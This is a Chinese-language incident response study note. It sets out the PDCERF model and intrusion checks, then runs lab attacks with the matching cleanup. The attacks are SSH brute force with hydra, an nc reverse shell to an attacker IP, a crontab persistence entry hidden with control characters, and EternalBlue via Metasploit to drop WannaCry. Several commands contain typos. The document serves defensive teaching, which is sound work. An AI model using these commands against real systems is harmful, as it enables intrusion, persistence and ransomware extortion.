应急响应事件分类

应用安全

webshell、网页篡改、网页挂马

系统安全

勒索病毒、挖矿木马、远控后门

网络安全

DDOS攻击、ARP攻击、流量劫持

数据安全

数据泄露、损坏、加密

如何做应急响应

确定攻击时间

能够帮助我们缩小应急响应范围,有助于提高效率

查找攻击线索

能够让我们知道攻击者做了什么事情

梳理攻击流程

还原整个攻击场景

实施解决方案

修复漏洞,切断攻击途径

定位攻击者

溯源取证

应急响应模型(PDCERF)

准备阶段(Preparation)

  • 应用团队建设
  • 应急方案制定
  • 渗透测试评估
  • 安全基线检查

检测阶段(Detection)

  • 判断事件类型
  • 判断事件级别
  • 确定应急方案

抑制阶段(Containment)

限制攻击/破环波及的范围,同时也是在降低潜在的损失

  • 阻断:IP地址、网络连接、危险主机
  • 关闭:可疑进程、可疑服务
  • 删除:违规账号、危险文件

根除阶段(Eradication)

通过事件分析找出根源并彻底根除,以避免再次利用

  • 增强:安全策略、全网监控
  • 恢复:应用漏洞、系统漏洞、补丁更新
  • 还原:操作系统、业务系统

恢复阶段(Recovery)

把被破坏的信息彻底还原到正常运行的状态

  • 恢复业务系统
  • 恢复用户数据
  • 恢复网络通信

总结阶段(Follow-up)

回顾并整合应急响应过程的相关信息,进行事后分析总结和修订安全计划、政策、程序,并进行训练,以防止入侵的再次发生

  • 事件会议总结
  • 响应报告输出
  • 响应工作优化

image-20240222213527429

image-20240222213555985

入侵排查

系统信息自检

Linux: lscpu,查看cpu信息

lsmod,查看载入的模块

排查恶意账户

image-20240223200309734

linux

image-20240223200657656

image-20240223200924557

启动项

windows

image-20240223201053810

image-20240223201242555

linux

image-20240223201336252

计划任务

windows

image-20240223201535747

linux

image-20240223201618804

SSH

SSH是什么

一种安全外壳协议

用途:远程登录系统

MobaXterm

image-20240223205020704

常见端口对应服务

image-20240223212717164

模拟SSH爆破攻击

攻击机:kali2022(192.168.48.138)

靶机:kali2021(192.168.48.135)

  • 信息收集

    使用nmap扫描目标主机的端口:

    bash
    1
    nmap 192.168.48.135

    发现开启了22端口,尝试爆破

爆破SSH

使用hydra进行爆破

bash
1
hydra -L users.txt -P password.txt ssh://192.168.48.135

users.txt–用户字典

password.txt–密码字典

SSH登录

bash
1
ssh root@192.168.48.135
image-20240223222336427

尝试创建隐藏计划任务

反弹shell

-e 执行指令

进入 /tmp 目录创建task.sh文件

txt
1
2
#!/bin/bash
nc 192.168.48.138 7777 -e /bin/bash

给予执行权限

bash
1
chmod +x tash.sh

创建create_task.sh

查看计划任务

每隔一分钟执行一次task.sh

txt
1
(crontab -l ;printf "* * * * * /tmp/task.sh;\rno crontw-wab for `whoami`%100c\n")|crontab-

给予执行权限

bash
1
chmod +x create_tash.sh

尝试nc连接目标主机的shell

bash
1
nc -lvp 7777

为什么要创建计划任务

权限维持,如果密码修改之后,还可以通过计划任务获得shell

(创建计划任务都是攻击机上的操作)

总结

image-20240226114336263

SSH应急响应

事件排查

bash
1
netstart -antpl

发现有外部连接

image-20240226112342750

查看进程树

bash
1
pstree -p

image-20240226112520184

查看具体进程

bash
1
systemctl status 193250

image-20240226112646379

查看计划任务

bash
1
cat -A /var/spool/cron/crontabs/root

image-20240226112822847

bash
1
2
查看文件上传时间
ls -l /tmp/task.sh

image-20240226112930830

查看内容

bash
1
cat /tmp/task.sh

image-20240226113040231

查看日志(登录成功)

bash
1
last -f /var/log/wtmp

image-20240226113307015

登录失败的日志

bash
1
last -f /var/log/btmp

删除隐藏的计划任务

bash
1
crontab -r -u root

再次查看没有了

image-20240226113748727

杀掉进程

bash
1
kill 193250

删除掉文件

bash
1
cd /tmp
bash
1
ls
bash
1
rm task.sh
bash
1
rm create_task.sh

修改账号密码

image-20240226114616648

修改ssh默认端口

image-20240226114639338

勒索病毒简介

image-20240226114827169

勒索病毒模拟攻击

攻击机:kali(192.1668.48.138)

靶机:win7(192.168.48.137)

启动msf

bash
1
msfconsole

搜索相关模块

永恒之蓝

bash
1
search ms17-010
使用永恒之蓝进行攻击

image-20240226145557037

bash
1
use 0

image-20240226145622570

配置参数

image-20240226145712381

bash
1
set rhosts 192.168.48.137

image-20240226150046596

开始攻击

bash
1
run

image-20240226150231173

爆破成功,返回一个会话

image-20240226150519855

上传病毒

文件夹下有一个勒索病毒压缩包

image-20240226151001291

解压
bash
1
unzip 文件名

image-20240226151144437

红色的需要继续解压

bash
1
ls -i

image-20240226151222548

找到压缩包,并解压

bash
1
find -inum 2228367 -exec unzip {} \;

image-20240226151359483

有下划线不是一个可执行文件,需要重命名

bash
1
mv wcry.exe_ wcry.exe

image-20240226151457676

上传

在会话中上传病毒

image-20240226152713430

image-20240226153130036

确定勒索病毒已执行

bash
1
ps -ef | grep wcry.exe

image-20240226153250438

勒索病毒应急响应

1、事件判断

2、临时处置

禁止使用U盘、移动硬盘

3、信息搜集与分析

样本分析
文件排查
image-20240226154449567

image-20240226154550832

txt
1
https://x.threatbook.com/

4、事件处置

image-20240226155023708 image-20240226155042674

5、事件防御